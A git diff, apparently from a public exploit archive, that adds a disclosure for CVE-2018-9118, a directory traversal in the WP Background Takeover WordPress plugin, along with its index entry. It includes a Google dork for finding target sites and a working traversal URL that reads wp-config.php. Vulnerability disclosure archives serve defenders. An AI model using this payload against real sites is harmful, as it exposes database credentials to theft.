diff --git a/exploits/php/webapps/44417.txt b/exploits/php/webapps/44417.txt
new file mode 100644
index 000000000..0ec8d9826
--- /dev/null
+++ b/exploits/php/webapps/44417.txt
@@ -0,0 +1,15 @@
+# Exploit Title: WP Background Takeover, Directory Traversal <= 4.1.4
+# Google Dork: inurl:/plugins/wpsite-background-takeover
+# Date: 2018-03-08
+# Exploit Author: Colette Chamberland, Defiant, Inc.
+# Vendor Homepage: https://99robots.com
+# Software Link: https://99robots.com/products/wp-background-takeover-advertisements/
+# Version: <= 4.1.4
+# Tested on: Wordpress 4.9.x
+# CVE : CVE-2018-9118
+
+Description
+
+Allows for an attacker to browse files via the download.php file:
+
+http://target[.]com/wp-content/plugins/wpsite-background-takeover/exports/download.php?filename=../../../../wp-config.php
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index 6487d1450..217983d5c 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -39151,6 +39151,7 @@ id,file,description,date,author,type,platform,port
 44413,exploits/hardware/webapps/44413.txt,"FiberHome VDSL2 Modem HG 150-UB - Authentication Bypass",2018-04-06,"Noman Riffat",webapps,hardware,
 44414,exploits/windows/webapps/44414.txt,"DotNetNuke DNNarticle Module 11 - Directory Traversal",2018-04-06,"Esmaeil Rahimian",webapps,windows,
 44416,exploits/php/webapps/44416.txt,"Cobub Razor 0.7.2 - Cross-Site Request Forgery",2018-04-06,ppb,webapps,php,
+44417,exploits/php/webapps/44417.txt,"Wordpress Background Takeover < 4.1.4 - Directory Traversal",2018-04-09,"Colette Chamberland",webapps,php,
 44418,exploits/php/webapps/44418.txt,"WolfCMS 0.8.3.1 - Cross-Site Request Forgery",2018-04-09,"Sureshbabu Narvaneni",webapps,php,
 44419,exploits/php/webapps/44419.txt,"Cobub Razor 0.7.2 - Add New Superuser Account",2018-04-09,ppb,webapps,php,
 44420,exploits/php/webapps/44420.txt,"MyBB Plugin Recent Threads On Index - Cross-Site Scripting",2018-04-09,Perileos,webapps,php,